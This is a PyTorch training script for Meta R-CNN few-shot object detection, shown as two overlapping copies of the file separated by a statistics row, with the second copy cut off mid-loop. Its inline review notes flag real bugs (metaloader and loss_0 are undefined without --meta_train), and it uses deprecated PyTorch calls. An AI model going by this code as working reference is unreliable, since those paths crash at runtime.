    parser.add_argument('--checkpoint', dest='checkpoint',
                        help='checkpoint to load model',
                        default=21985, type=int)
    # log and diaplay
    parser.add_argument('--use_tfboard', dest='use_tfboard',
                        help='whether use tensorflow tensorboard',
                        default=True, type=_str2bool)
    parser.add_argument('--log_dir', dest='log_dir',
                        help='directory to save logs', default='logs',
                        type=str)
    args = parser.parse_args()
    return args
# ---------------------------------------------------------------------------
# Training entry point. Flow: parse args -> resolve dataset split names ->
# load config -> build roidb/dataloaders (plus the PRN meta-dataset when
# meta-training) -> build Meta R-CNN -> optional resume -> training loop with
# periodic logging/TensorBoard -> per-epoch checkpoints -> (meta-training
# only) dump mean per-class attention vectors for test time.
# ---------------------------------------------------------------------------
if __name__ == '__main__':
    args = parse_args()
    print('Called with args:')
    print(args)
    if args.use_tfboard:
        writer = SummaryWriter(args.log_dir)
    # Map the chosen dataset to its imdb names and anchor/config overrides.
    if args.dataset == "coco2017":
        args.imdb_name = "coco_2017_train"
        args.imdbval_name = "coco_2017_val"
        args.set_cfgs = ['ANCHOR_SCALES', '[2, 4, 8, 16, 32]', 'ANCHOR_RATIOS', '[0.5,1,2]', 'MAX_NUM_GT_BOXES', '50']
    elif args.dataset == "coco":
        args.imdb_name = "coco_2014_train+coco_2014_valminusminival"
        args.imdbval_name = "coco_2014_minival"
        args.set_cfgs = ['ANCHOR_SCALES', '[2, 4, 8, 16, 32]', 'ANCHOR_RATIOS', '[0.5,1,2]', 'MAX_NUM_GT_BOXES', '50']
    elif args.dataset == "pascal_voc_0712":
        if args.phase == 1:  # three types of base and novel classes splits
            if args.meta_type == 1:
                args.imdb_name = "voc_2007_train_first_split+voc_2012_train_first_split"
            elif args.meta_type == 2:
                args.imdb_name = "voc_2007_train_second_split+voc_2012_train_second_split"
            elif args.meta_type == 3:
                args.imdb_name = "voc_2007_train_third_split+voc_2012_train_third_split"
        else:
            args.imdb_name = "voc_2007_shots"  # the default sampled shots saved path of meta classes in the first phase
        args.imdbval_name = "voc_2007_test"
        args.set_cfgs = ['ANCHOR_SCALES', '[8, 16, 32]', 'ANCHOR_RATIOS', '[0.5,1,2]', 'MAX_NUM_GT_BOXES', '20']
    # the number of sets of metaclass
    cfg.TRAIN.META_TYPE = args.meta_type
    cfg.USE_GPU_NMS = args.cuda
    if args.cuda:
        cfg.CUDA = True
    args.cfg_file = "cfgs/res101_ms.yml"
    if args.cfg_file is not None:
        cfg_from_file(args.cfg_file)
    if args.set_cfgs is not None:
        cfg_from_list(args.set_cfgs)
    print('Using config:')
    pprint.pprint(cfg)
    np.random.seed(cfg.RNG_SEED)
    # torch.manual_seed(cfg.RNG_SEED)       # set the random seed for the CPU
    # torch.cuda.manual_seed(cfg.RNG_SEED)  # set the random seed for the current GPU
    if torch.cuda.is_available() and not args.cuda:
        print("WARNING: You have a CUDA device, so you should probably run with --cuda")
    # Class list selection: phase 1 trains on base classes with a fixed
    # 200-shot meta set; phase 2 fine-tunes on base + novel classes with
    # args.shots examples per class.
    if args.phase == 1:
        # First phase only use the base classes
        shots = 200
        if args.meta_type == 1:  # use the first sets of base classes
            metaclass = cfg.TRAIN.BASECLASSES_FIRST
        if args.meta_type == 2:  # use the second sets of base classes
            metaclass = cfg.TRAIN.BASECLASSES_SECOND
        if args.meta_type == 3:  # use the third sets of base classes
            metaclass = cfg.TRAIN.BASECLASSES_THIRD
    else:
        # Second phase only use fewshot number of base and novel classes
        shots = args.shots
        if args.meta_type == 1:  # use the first sets of all classes
            metaclass = cfg.TRAIN.ALLCLASSES_FIRST
        if args.meta_type == 2:  # use the second sets of all classes
            metaclass = cfg.TRAIN.ALLCLASSES_SECOND
        if args.meta_type == 3:  # use the third sets of all classes
            metaclass = cfg.TRAIN.ALLCLASSES_THIRD
    num_ways = len(metaclass)
    # prepare meta sets for meta training
    if args.meta_train:
        # construct the input dataset of PRN network
        img_size = 224
        if args.phase == 1:
            img_set = [('2007', 'trainval'), ('2012', 'trainval')]
        else:
            img_set = [('2007', 'trainval')]
        metadataset = MetaDataset('data/VOCdevkit',
                                  img_set, metaclass, img_size, shots=shots, shuffle=True,phase = args.phase)
        metaloader = torch.utils.data.DataLoader(metadataset, batch_size=1, shuffle=False, num_workers=0,
                                                 pin_memory=True)
    imdb, roidb, ratio_list, ratio_index = combined_roidb(args.imdb_name)
    # filter roidb for the second phase
    if args.phase == 2:
        roidb = filter_class_roidb(roidb, args.shots, imdb)
        ratio_list, ratio_index = rank_roidb_ratio(roidb)
        imdb.set_roidb(roidb)
    train_size = len(roidb)
    print('{:d} roidb entries'.format(len(roidb)))
    sys.stdout.flush()
    output_dir = args.save_dir
    if not os.path.exists(output_dir):
        os.makedirs(output_dir)
    sampler_batch = sampler(train_size, args.batch_size)
    dataset = roibatchLoader(roidb, ratio_list, ratio_index, args.batch_size, imdb.num_classes, training=True)
    dataloader = torch.utils.data.DataLoader(dataset, batch_size=args.batch_size,
                                             sampler=sampler_batch, num_workers=args.num_workers, pin_memory=False)
    # initialize the network here
    if args.net == 'metarcnn':
        fasterRCNN = resnet(imdb.classes, num_ways, 101, pretrained=True, class_agnostic=args.class_agnostic,
                            meta_train=args.meta_train, meta_loss=args.meta_loss, transductive=args.transductive, visualization=args.visualization)
    fasterRCNN.create_architecture()
    # initialize the optimizer here
    lr = cfg.TRAIN.LEARNING_RATE
    lr = args.lr
    params = []
    # Per-parameter options: biases may get doubled lr and (optionally) no weight decay.
    for key, value in dict(fasterRCNN.named_parameters()).items():
        if value.requires_grad:
            if 'bias' in key:
                params += [{'params': [value], 'lr': lr * (cfg.TRAIN.DOUBLE_BIAS + 1), \
                            'weight_decay': cfg.TRAIN.BIAS_DECAY and cfg.TRAIN.WEIGHT_DECAY or 0}]
            else:
                params += [{'params': [value], 'lr': lr, 'weight_decay': cfg.TRAIN.WEIGHT_DECAY}]
    if args.optimizer == "adam":
        lr = lr * 0.1
        optimizer = torch.optim.Adam(params)
    elif args.optimizer == "sgd":
        optimizer = torch.optim.SGD(params, momentum=cfg.TRAIN.MOMENTUM)
    if args.cuda:
        fasterRCNN.cuda()
    if args.resume:
        load_name = os.path.join(output_dir,
                                 '{}_metarcnn_{}_{}_{}.pth'.format(args.dataset, args.checksession,
                                                                   args.checkepoch, args.checkpoint))
        print("loading checkpoint %s" % (load_name))
        checkpoint = torch.load(load_name)
        args.session = checkpoint['session']
        args.start_epoch = checkpoint['epoch']
        # the number of classes in second phase is different from first phase
        if args.phase == 2:
            new_state_dict = OrderedDict()
            # initialize params of RCNN_cls_score and RCNN_bbox_pred for second phase
            RCNN_cls_score_n = nn.Linear(2048, imdb.num_classes)
            RCNN_bbox_pred = nn.Linear(2048, 4 * imdb.num_classes)
            for k, v in checkpoint['model'].items():
                name = k
                new_state_dict[name] = v
                # Class-count-dependent heads cannot be loaded from the phase-1
                # checkpoint, so they are replaced with freshly initialized layers.
                if 'RCNN_cls_score_n.weight' in k:
                    new_state_dict[name] = RCNN_cls_score_n.weight
                if 'RCNN_cls_score_n.bias' in k:
                    new_state_dict[name] = RCNN_cls_score_n.bias
                if 'RCNN_bbox_pred.weight' in k:
                    new_state_dict[name] = RCNN_bbox_pred.weight
                if 'RCNN_bbox_pred.bias' in k:
                    new_state_dict[name] = RCNN_bbox_pred.bias
            fasterRCNN.load_state_dict(new_state_dict)
        elif args.phase == 1:
            fasterRCNN.load_state_dict(checkpoint['model'])
        optimizer.load_state_dict(checkpoint['optimizer'])
        lr = optimizer.param_groups[0]['lr']
        if 'pooling_mode' in checkpoint.keys():
            cfg.POOLING_MODE = checkpoint['pooling_mode']
        print("loaded checkpoint %s" % (load_name))
    iters_per_epoch = int(train_size / args.batch_size)
    # ---------------- main training loop ----------------
    for epoch in range(args.start_epoch, args.max_epochs):
        fasterRCNN.train()
        loss_temp = 0
        start = time.time()
        if epoch % (args.lr_decay_step + 1) == 0:
            adjust_learning_rate(optimizer, args.lr_decay_gamma)
            lr *= args.lr_decay_gamma
        data_iter = iter(dataloader)
        # NOTE(review): metaloader is only defined when --meta_train is set;
        # this unconditional iter(metaloader) raises NameError otherwise — confirm.
        meta_iter = iter(metaloader)
        for step in range(iters_per_epoch):
            # Restart the loader when it is exhausted mid-epoch.
            try:
                data = next(data_iter)
            except:
                data_iter = iter(dataloader)
                data = next(data_iter)
            im_data_list = []
            im_info_list = []
            gt_boxes_list = []
            num_boxes_list = []
            # initialize the tensor holder here.
            im_data = torch.FloatTensor(1)
            im_info = torch.FloatTensor(1)
            num_boxes = torch.LongTensor(1)
            gt_boxes = torch.FloatTensor(1)
            # ship to cuda
            if args.cuda:
                im_data = im_data.cuda()
                im_info = im_info.cuda()
                num_boxes = num_boxes.cuda()
                gt_boxes = gt_boxes.cuda()
            # make variable
            im_data = Variable(im_data)
            im_info = Variable(im_info)
            num_boxes = Variable(num_boxes)
            gt_boxes = Variable(gt_boxes)
            if args.meta_train:
                # get prn network input data
                try:
                    prndata,prncls = next(meta_iter)
                except:
                    meta_iter = iter(metaloader)
                    prndata, prncls = next(meta_iter)
                # When meta-training, the first list entry is the PRN support
                # batch and the second entry is the regular detection batch.
                im_data_list.append(Variable(torch.cat(prndata,dim=0).cuda()))
                im_info_list.append(prncls)
                im_data.data.resize_(data[0].size()).copy_(data[0])
                im_info.data.resize_(data[1].size()).copy_(data[1])
                gt_boxes.data.resize_(data[2].size()).copy_(data[2])
                num_boxes.data.resize_(data[3].size()).copy_(data[3])
                im_data_list.append(im_data)
                im_info_list.append(im_info)
                gt_boxes_list.append(gt_boxes)
                num_boxes_list.append(num_boxes)
            else:
                im_data.data.resize_(data[0].size()).copy_(data[0])
                im_info.data.resize_(data[1].size()).copy_(data[1])
                gt_boxes.data.resize_(data[2].size()).copy_(data[2])
                num_boxes.data.resize_(data[3].size()).copy_(data[3])
                im_data_list.append(im_data)
                im_info_list.append(im_info)
                gt_boxes_list.append(gt_boxes)
                num_boxes_list.append(num_boxes)
            fasterRCNN.zero_grad()
            rois, rpn_loss_cls, rpn_loss_box, \
            RCNN_loss_cls, RCNN_loss_bbox, \
            rois_label, cls_prob, bbox_pred, meta_loss, simloss, dis_simloss = fasterRCNN(im_data_list, im_info_list, gt_boxes_list,
                                                                                          num_boxes_list)
            if args.meta_train:
                # The loss is split in two pieces; loss is backpropagated with
                # retain_graph=True so loss_0 can be backpropagated afterwards.
                loss = rpn_loss_cls.mean() + rpn_loss_box.mean() + sum(RCNN_loss_bbox) / args.batch_size + meta_loss / len(metaclass)
                loss_0 = RCNN_loss_cls.mean() + simloss + dis_simloss
            else:
                loss = rpn_loss_cls.mean() + rpn_loss_box.mean() \
                       + RCNN_loss_cls.mean() + RCNN_loss_bbox.mean()
            loss_temp += loss.data[0]
            # backward
            optimizer.zero_grad()
            loss.backward(retain_graph=True)
            # NOTE(review): loss_0 is only assigned in the meta_train branch;
            # without --meta_train this line raises NameError — confirm intended.
            loss_0.backward()
            optimizer.step()
            torch.cuda.empty_cache()
            # ---- periodic console / TensorBoard logging ----
            if step % args.disp_interval == 0:
                end = time.time()
                if step > 0:
                    loss_temp /= args.disp_interval  # loss_temp is aver loss
                loss_rpn_cls = rpn_loss_cls.data[0]
                loss_rpn_box = rpn_loss_box.data[0]
                if not args.meta_train:
                    loss_rcnn_cls = RCNN_loss_cls.data[0]
                    loss_rcnn_box = RCNN_loss_bbox.data[0]
                else:
                    loss_rcnn_cls = RCNN_loss_cls.mean()
                    loss_rcnn_box = sum(RCNN_loss_bbox) / args.batch_size
                    loss_metarcnn = meta_loss / len(metaclass)
                    simloss = simloss
                    dis_simloss = dis_simloss
                fg_cnt = torch.sum(rois_label.data.ne(0))
                bg_cnt = rois_label.data.numel() - fg_cnt
                print("[session %d][epoch %2d][iter %4d] loss: %.4f, lr: %.2e" \
                      % (args.session, epoch, step, loss_temp, lr))
                print("\t\t\tfg/bg=(%d/%d), time cost: %f" % (fg_cnt, bg_cnt, end - start))
                if args.meta_train:
                    print("\t\t\trpn_cls: %.4f, rpn_box: %.4f, rcnn_cls: %.4f, rcnn_box %.4f, meta_loss %.4f, simloss: %.4f, dis_simloss %.4f" \
                          % (loss_rpn_cls, loss_rpn_box, loss_rcnn_cls, loss_rcnn_box, loss_metarcnn, simloss, dis_simloss ))
                else:
                    print("\t\t\trpn_cls: %.4f, rpn_box: %.4f, rcnn_cls: %.4f, rcnn_box %.4f" \
                          % (loss_rpn_cls, loss_rpn_box, loss_rcnn_cls, loss_rcnn_box))
                sys.stdout.flush()
                if args.use_tfboard:
                    info = {
                        'loss': loss_temp,
                        'loss_rpn_cls': loss_rpn_cls,
                        'loss_rpn_box': loss_rpn_box,
                        'loss_rcnn_cls': loss_rcnn_cls,
                        'loss_rcnn_box': loss_rcnn_box
                    }
                    niter = (epoch - 1) * iters_per_epoch + step
                    for tag, value in info.items():
                        writer.add_scalar(tag, value, niter)
                loss_temp = 0
                start = time.time()
        # ---- end-of-epoch checkpoint ----
        if args.meta_train:
            save_name = os.path.join(output_dir,
                                     '{}_{}_{}_{}_{}.pth'.format(str(args.dataset), str(args.net), shots, epoch,
                                                                 step))
        else:
            save_name = os.path.join(output_dir, '{}_{}_{}_{}.pth'.format(str(args.dataset), str(args.net),
                                                                          epoch, step))
        save_checkpoint({
            'session': args.session,
            'epoch': epoch + 1,
            'model': fasterRCNN.state_dict(),
            'optimizer': optimizer.state_dict(),
            'pooling_mode': cfg.POOLING_MODE,
            'class_agnostic': args.class_agnostic,
        }, save_name)
        print('save model: {}'.format(save_name))
        end = time.time()
        print(end - start)
    if args.meta_train:  # to extract the mean classes attentions of shots for testing
        class_attentions = collections.defaultdict(list)
        class_attentions_t = collections.defaultdict(list)
        meta_iter = iter(metaloader)
        for i in range(shots):
            prndata, prncls = next(meta_iter)
            im_data_list = []
            im_info_list = []
            gt_boxes_list = []
            num_boxes_list = []
            im_data = torch.FloatTensor(1)
            if args.cuda:
                im_data = im_data.cuda()
            im_data = Variable(im_data, volatile=True)
            im_data.data.resize_(prndata.squeeze(0).size()).copy_(prndata.squeeze(0))
            im_data_list.append(im_data)
            attentions, attentions_t = fasterRCNN(im_data_list, im_info_list, gt_boxes_list, num_boxes_list,
                                                  average_shot=True)
            for idx, cls in enumerate(prncls):
                class_attentions[int(cls)].append(attentions[idx])
                class_attentions_t[int(cls)].append(attentions_t[idx])
        # calculate mean attention vectors of every class
        mean_class_attentions = {k: sum(v) / len(v) for k, v in class_attentions.items()}
        mean_class_attentions_t = {k: sum(v) / len(v) for k, v in class_attentions_t.items()}
        save_path = 'attentions'
        if not os.path.exists(save_path):
            os.mkdir(save_path)
        with open(os.path.join(save_path, str(args.phase) + '_shots_' + str(args.shots) + '_mean_class_attentions.pkl'), 'wb') as f:
            pickle.dump(mean_class_attentions, f, pickle.HIGHEST_PROTOCOL)
        print('save ' + str(args.shots) + ' mean classes attentions done!')
        with open(os.path.join(save_path, str(args.phase) + '_shots_' + str(args.shots) + '_mean_class_attentions_t.pkl'), 'wb') as t:
            pickle.dump(mean_class_attentions_t, t, pickle.HIGHEST_PROTOCOL)
        print('save ' + str(args.shots) + ' mean classes attentions_t done!')
| 45.896226 | 147 | 0.575005 | # --------------------------------------------------------
# Pytorch Meta R-CNN
# Written by Anny Xu, Xiaopeng Yan, based on the code from Jianwei Yang
# --------------------------------------------------------
import _init_paths
import os
import sys
import numpy as np
import argparse
import pprint
import pdb
import time
import collections
import torch
import torch.nn as nn
import torch.optim as optim
import random
from tensorboardX import SummaryWriter
import torchvision.transforms as transforms
from torch.utils.data.sampler import Sampler
from torch.autograd import Variable
import torch.utils.data as Data
from roi_data_layer.roidb import combined_roidb, rank_roidb_ratio, filter_class_roidb
from roi_data_layer.roibatchLoader import roibatchLoader
from model.utils.config import cfg, cfg_from_file, cfg_from_list, get_output_dir
from model.utils.net_utils import weights_normal_init, save_net, load_net, \
adjust_learning_rate, save_checkpoint, clip_gradient
from model.faster_rcnn.resnet import resnet
import pickle
from datasets.metadata import MetaDataset
from collections import OrderedDict
def parse_args():
    """
    Parse input arguments for Meta R-CNN training.

    Returns:
        argparse.Namespace: all training options (dataset/model selection,
        optimisation, meta-learning, checkpointing and logging settings).
    """
    def _str2bool(value):
        # argparse's ``type=bool`` is a well-known trap: bool("False") is
        # True, so any value typed on the command line would enable the flag.
        # Parse the usual textual spellings explicitly instead; defaults
        # (real bools) pass straight through unchanged.
        if isinstance(value, bool):
            return value
        if value.lower() in ('true', 't', 'yes', 'y', '1'):
            return True
        if value.lower() in ('false', 'f', 'no', 'n', '0'):
            return False
        raise argparse.ArgumentTypeError('boolean value expected, got %r' % (value,))

    parser = argparse.ArgumentParser(description='Train Meta R-CNN network')
    # Define training data and Model
    parser.add_argument('--dataset', dest='dataset',
                        help='training dataset:coco2017,coco,pascal_07_12',
                        default='pascal_voc_0712', type=str)
    parser.add_argument('--net', dest='net',
                        help='metarcnn',
                        default='metarcnn', type=str)
    # Define display and save dir
    parser.add_argument('--start_epoch', dest='start_epoch',
                        help='starting epoch',
                        default=1, type=int)
    parser.add_argument('--epochs', dest='max_epochs',
                        help='number of epochs to train',
                        default=21, type=int)
    parser.add_argument('--disp_interval', dest='disp_interval',
                        help='number of iterations to display',
                        default=100, type=int)
    parser.add_argument('--checkpoint_interval', dest='checkpoint_interval',
                        help='number of iterations to display',
                        default=10000, type=int)
    parser.add_argument('--save_dir', dest='save_dir',
                        help='directory to save models', default="./models",
                        type=str)
    # Define training parameters
    parser.add_argument('--nw', dest='num_workers',
                        help='number of worker to load data',
                        default=0, type=int)
    parser.add_argument('--cuda', dest='cuda', default=True, type=_str2bool,
                        help='whether use CUDA')
    parser.add_argument('--bs', dest='batch_size',
                        help='batch_size',
                        default=1, type=int)
    parser.add_argument('--cag', dest='class_agnostic', default=False, type=_str2bool,
                        help='whether perform class_agnostic bbox regression')
    # Define meta parameters
    parser.add_argument('--meta_train', dest='meta_train', default=False, type=_str2bool,
                        help='whether perform meta training')
    parser.add_argument('--meta_loss', dest='meta_loss', default=False, type=_str2bool,
                        help='whether perform adding meta loss')
    parser.add_argument('--transductive', dest='transductive', default=True, type=_str2bool,
                        help='whether perform transductive')
    parser.add_argument('--visualization', dest='visualization', default=False, type=_str2bool,
                        help='whether perform visualization')
    parser.add_argument('--phase', dest='phase',
                        help='the phase of training process',
                        default=1, type=int)
    parser.add_argument('--shots', dest='shots',
                        help='the number meta input of PRN network',
                        default=1, type=int)
    parser.add_argument('--meta_type', dest='meta_type', default=1, type=int,
                        help='choose which sets of metaclass')
    # config optimization
    parser.add_argument('--o', dest='optimizer',
                        help='training optimizer',
                        default="sgd", type=str)
    parser.add_argument('--lr', dest='lr',
                        help='starting learning rate',
                        default=0.001, type=float)
    parser.add_argument('--lr_decay_step', dest='lr_decay_step',
                        help='step to do learning rate decay, unit is epoch',
                        default=4, type=int)
    parser.add_argument('--lr_decay_gamma', dest='lr_decay_gamma',
                        help='learning rate decay ratio',
                        default=0.1, type=float)
    # set training session
    parser.add_argument('--s', dest='session',
                        help='training session',
                        default=1, type=int)
    # resume trained model
    parser.add_argument('--r', dest='resume',
                        help='resume checkpoint or not',
                        default=False, type=_str2bool)
    parser.add_argument('--checksession', dest='checksession',
                        help='checksession to load model',
                        default=1, type=int)
    parser.add_argument('--checkepoch', dest='checkepoch',
                        help='checkepoch to load model',
                        default=10, type=int)
    parser.add_argument('--checkpoint', dest='checkpoint',
                        help='checkpoint to load model',
                        default=21985, type=int)
    # log and diaplay
    parser.add_argument('--use_tfboard', dest='use_tfboard',
                        help='whether use tensorflow tensorboard',
                        default=True, type=_str2bool)
    parser.add_argument('--log_dir', dest='log_dir',
                        help='directory to save logs', default='logs',
                        type=str)
    args = parser.parse_args()
    return args
class sampler(Sampler):
    """Batch-aligned random sampler.

    Yields dataset indices so that each group of ``batch_size`` consecutive
    indices stays together; whole batches are shuffled as units each epoch.
    Trailing indices that do not fill a complete batch are appended,
    unshuffled, after the permuted batches.
    """

    def __init__(self, train_size, batch_size):
        self.num_data = train_size
        self.num_per_batch = int(train_size / batch_size)
        self.batch_size = batch_size
        # Column offsets 0..batch_size-1, broadcast against the shuffled
        # batch base offsets in __iter__.
        self.range = torch.arange(0, batch_size).view(1, batch_size).long()
        # Remember whether a partial batch exists at the tail.
        self.leftover_flag = train_size % batch_size != 0
        if self.leftover_flag:
            self.leftover = torch.arange(self.num_per_batch * batch_size, train_size).long()

    def __iter__(self):
        # Randomly permute the batch start offsets, then expand each into a
        # full run of batch_size consecutive indices.
        bases = torch.randperm(self.num_per_batch).view(-1, 1) * self.batch_size
        self.rand_num = bases.expand(self.num_per_batch, self.batch_size) + self.range
        self.rand_num_view = self.rand_num.view(-1)
        if self.leftover_flag:
            self.rand_num_view = torch.cat((self.rand_num_view, self.leftover), 0)
        return iter(self.rand_num_view)

    def __len__(self):
        return self.num_data
if __name__ == '__main__':
    args = parse_args()
    print('Called with args:')
    print(args)
    if args.use_tfboard:
        writer = SummaryWriter(args.log_dir)
    # ---- Dataset selection: choose imdb names and anchor configs ----
    if args.dataset == "coco2017":
        args.imdb_name = "coco_2017_train"
        args.imdbval_name = "coco_2017_val"
        args.set_cfgs = ['ANCHOR_SCALES', '[2, 4, 8, 16, 32]', 'ANCHOR_RATIOS', '[0.5,1,2]', 'MAX_NUM_GT_BOXES', '50']
    elif args.dataset == "coco":
        args.imdb_name = "coco_2014_train+coco_2014_valminusminival"
        args.imdbval_name = "coco_2014_minival"
        args.set_cfgs = ['ANCHOR_SCALES', '[2, 4, 8, 16, 32]', 'ANCHOR_RATIOS', '[0.5,1,2]', 'MAX_NUM_GT_BOXES', '50']
    elif args.dataset == "pascal_voc_0712":
        if args.phase == 1: # three types of base and novel classes splits
            if args.meta_type == 1:
                args.imdb_name = "voc_2007_train_first_split+voc_2012_train_first_split"
            elif args.meta_type == 2:
                args.imdb_name = "voc_2007_train_second_split+voc_2012_train_second_split"
            elif args.meta_type == 3:
                args.imdb_name = "voc_2007_train_third_split+voc_2012_train_third_split"
        else:
            args.imdb_name = "voc_2007_shots" # the default sampled shots saved path of meta classes in the first phase
        args.imdbval_name = "voc_2007_test"
        args.set_cfgs = ['ANCHOR_SCALES', '[8, 16, 32]', 'ANCHOR_RATIOS', '[0.5,1,2]', 'MAX_NUM_GT_BOXES', '20']
    # ---- Merge config file and per-dataset overrides into the global cfg ----
    # the number of sets of metaclass
    cfg.TRAIN.META_TYPE = args.meta_type
    cfg.USE_GPU_NMS = args.cuda
    if args.cuda:
        cfg.CUDA = True
    args.cfg_file = "cfgs/res101_ms.yml"
    if args.cfg_file is not None:
        cfg_from_file(args.cfg_file)
    if args.set_cfgs is not None:
        cfg_from_list(args.set_cfgs)
    print('Using config:')
    pprint.pprint(cfg)
    np.random.seed(cfg.RNG_SEED)
    #torch.manual_seed(cfg.RNG_SEED) # set the random seed for the CPU
    #torch.cuda.manual_seed(cfg.RNG_SEED) # set the random seed for the current GPU
    if torch.cuda.is_available() and not args.cuda:
        print("WARNING: You have a CUDA device, so you should probably run with --cuda")
    # ---- Phase / metaclass selection: phase 1 trains on base classes only,
    # phase 2 fine-tunes on few shots of base + novel classes ----
    if args.phase == 1:
        # First phase only use the base classes
        shots = 200
        if args.meta_type == 1: # use the first sets of base classes
            metaclass = cfg.TRAIN.BASECLASSES_FIRST
        if args.meta_type == 2: # use the second sets of base classes
            metaclass = cfg.TRAIN.BASECLASSES_SECOND
        if args.meta_type == 3: # use the third sets of base classes
            metaclass = cfg.TRAIN.BASECLASSES_THIRD
    else:
        # Second phase only use fewshot number of base and novel classes
        shots = args.shots
        if args.meta_type == 1: # use the first sets of all classes
            metaclass = cfg.TRAIN.ALLCLASSES_FIRST
        if args.meta_type == 2: # use the second sets of all classes
            metaclass = cfg.TRAIN.ALLCLASSES_SECOND
        if args.meta_type == 3: # use the third sets of all classes
            metaclass = cfg.TRAIN.ALLCLASSES_THIRD
    num_ways = len(metaclass)
    # prepare meta sets for meta training
    if args.meta_train:
        # construct the input dataset of PRN network
        img_size = 224
        if args.phase == 1:
            img_set = [('2007', 'trainval'), ('2012', 'trainval')]
        else:
            img_set = [('2007', 'trainval')]
        metadataset = MetaDataset('data/VOCdevkit',
                                  img_set, metaclass, img_size, shots=shots, shuffle=True,phase = args.phase)
        # print(metadataset)
        metaloader = torch.utils.data.DataLoader(metadataset, batch_size=1, shuffle=False, num_workers=0,
                                                 pin_memory=True)
        # print(metadataset)
    # ---- Build the detection roidb and its data loader ----
    imdb, roidb, ratio_list, ratio_index = combined_roidb(args.imdb_name)
    # filter roidb for the second phase
    if args.phase == 2:
        roidb = filter_class_roidb(roidb, args.shots, imdb)
        ratio_list, ratio_index = rank_roidb_ratio(roidb)
        imdb.set_roidb(roidb)
    train_size = len(roidb)
    print('{:d} roidb entries'.format(len(roidb)))
    sys.stdout.flush()
    output_dir = args.save_dir
    if not os.path.exists(output_dir):
        os.makedirs(output_dir)
    sampler_batch = sampler(train_size, args.batch_size)
    dataset = roibatchLoader(roidb, ratio_list, ratio_index, args.batch_size, imdb.num_classes, training=True)
    dataloader = torch.utils.data.DataLoader(dataset, batch_size=args.batch_size,
                                             sampler=sampler_batch, num_workers=args.num_workers, pin_memory=False)
    # initilize the network here
    if args.net == 'metarcnn':
        fasterRCNN = resnet(imdb.classes, num_ways, 101, pretrained=True, class_agnostic=args.class_agnostic,
                            meta_train=args.meta_train, meta_loss=args.meta_loss, transductive=args.transductive, visualization=args.visualization)
    fasterRCNN.create_architecture()
    # initilize the optimizer here
    lr = cfg.TRAIN.LEARNING_RATE
    lr = args.lr
    # Per-parameter groups: biases get doubled lr and (optionally) no decay.
    params = []
    for key, value in dict(fasterRCNN.named_parameters()).items():
        if value.requires_grad:
            if 'bias' in key:
                params += [{'params': [value], 'lr': lr * (cfg.TRAIN.DOUBLE_BIAS + 1), \
                            'weight_decay': cfg.TRAIN.BIAS_DECAY and cfg.TRAIN.WEIGHT_DECAY or 0}]
            else:
                params += [{'params': [value], 'lr': lr, 'weight_decay': cfg.TRAIN.WEIGHT_DECAY}]
    if args.optimizer == "adam":
        lr = lr * 0.1
        optimizer = torch.optim.Adam(params)
    elif args.optimizer == "sgd":
        optimizer = torch.optim.SGD(params, momentum=cfg.TRAIN.MOMENTUM)
    if args.cuda:
        fasterRCNN.cuda()
    # ---- Optionally resume from a saved checkpoint ----
    if args.resume:
        load_name = os.path.join(output_dir,
                                 '{}_metarcnn_{}_{}_{}.pth'.format(args.dataset, args.checksession,
                                                                   args.checkepoch, args.checkpoint))
        print("loading checkpoint %s" % (load_name))
        checkpoint = torch.load(load_name)
        args.session = checkpoint['session']
        args.start_epoch = checkpoint['epoch']
        # the number of classes in second phase is different from first phase
        if args.phase == 2:
            new_state_dict = OrderedDict()
            # initilize params of RCNN_cls_score and RCNN_bbox_pred for second phase
            RCNN_cls_score_n = nn.Linear(2048, imdb.num_classes)
            RCNN_bbox_pred = nn.Linear(2048, 4 * imdb.num_classes)
            for k, v in checkpoint['model'].items():
                name = k
                new_state_dict[name] = v
                if 'RCNN_cls_score_n.weight' in k:
                    new_state_dict[name] = RCNN_cls_score_n.weight
                if 'RCNN_cls_score_n.bias' in k:
                    new_state_dict[name] = RCNN_cls_score_n.bias
                if 'RCNN_bbox_pred.weight' in k:
                    new_state_dict[name] = RCNN_bbox_pred.weight
                if 'RCNN_bbox_pred.bias' in k:
                    new_state_dict[name] = RCNN_bbox_pred.bias
            fasterRCNN.load_state_dict(new_state_dict)
        elif args.phase == 1:
            fasterRCNN.load_state_dict(checkpoint['model'])
        optimizer.load_state_dict(checkpoint['optimizer'])
        lr = optimizer.param_groups[0]['lr']
        if 'pooling_mode' in checkpoint.keys():
            cfg.POOLING_MODE = checkpoint['pooling_mode']
        print("loaded checkpoint %s" % (load_name))
    # ---- Main training loop: one pass over the roidb per epoch ----
    iters_per_epoch = int(train_size / args.batch_size)
    for epoch in range(args.start_epoch, args.max_epochs):
        fasterRCNN.train()
        loss_temp = 0
        start = time.time()
        if epoch % (args.lr_decay_step + 1) == 0:
            adjust_learning_rate(optimizer, args.lr_decay_gamma)
            lr *= args.lr_decay_gamma
        data_iter = iter(dataloader)
        meta_iter = iter(metaloader)
        for step in range(iters_per_epoch):
            # Restart the loader when it is exhausted mid-epoch.
            try:
                data = next(data_iter)
            except:
                data_iter = iter(dataloader)
                data = next(data_iter)
            # print(data)
            im_data_list = []
            im_info_list = []
            gt_boxes_list = []
            num_boxes_list = []
            # initilize the tensor holder here.
            im_data = torch.FloatTensor(1)
            im_info = torch.FloatTensor(1)
            num_boxes = torch.LongTensor(1)
            gt_boxes = torch.FloatTensor(1)
            # ship to cuda
            if args.cuda:
                im_data = im_data.cuda()
                im_info = im_info.cuda()
                num_boxes = num_boxes.cuda()
                gt_boxes = gt_boxes.cuda()
            # make variable
            im_data = Variable(im_data)
            im_info = Variable(im_info)
            num_boxes = Variable(num_boxes)
            gt_boxes = Variable(gt_boxes)
            if args.meta_train:
                # get prn network input data
                try:
                    prndata,prncls = next(meta_iter)
                except:
                    meta_iter = iter(metaloader)
                    prndata, prncls = next(meta_iter)
                #prn_cls = []
                #for i in range(len(prncls)):
                #    prncls_num = prncls[i]
                #    length = prncls_num.size() - 1
                #    for prncls_num in enumerate(prncls_num.split(length,0)):
                #        prn_cls.append(prncls_num[1])
                im_data_list.append(Variable(torch.cat(prndata,dim=0).cuda()))
                im_info_list.append(prncls)
                im_data.data.resize_(data[0].size()).copy_(data[0])
                im_info.data.resize_(data[1].size()).copy_(data[1])
                gt_boxes.data.resize_(data[2].size()).copy_(data[2])
                num_boxes.data.resize_(data[3].size()).copy_(data[3])
                im_data_list.append(im_data)
                im_info_list.append(im_info)
                gt_boxes_list.append(gt_boxes)
                num_boxes_list.append(num_boxes)
                # print(im_data_list)
                # print(im_info_list)
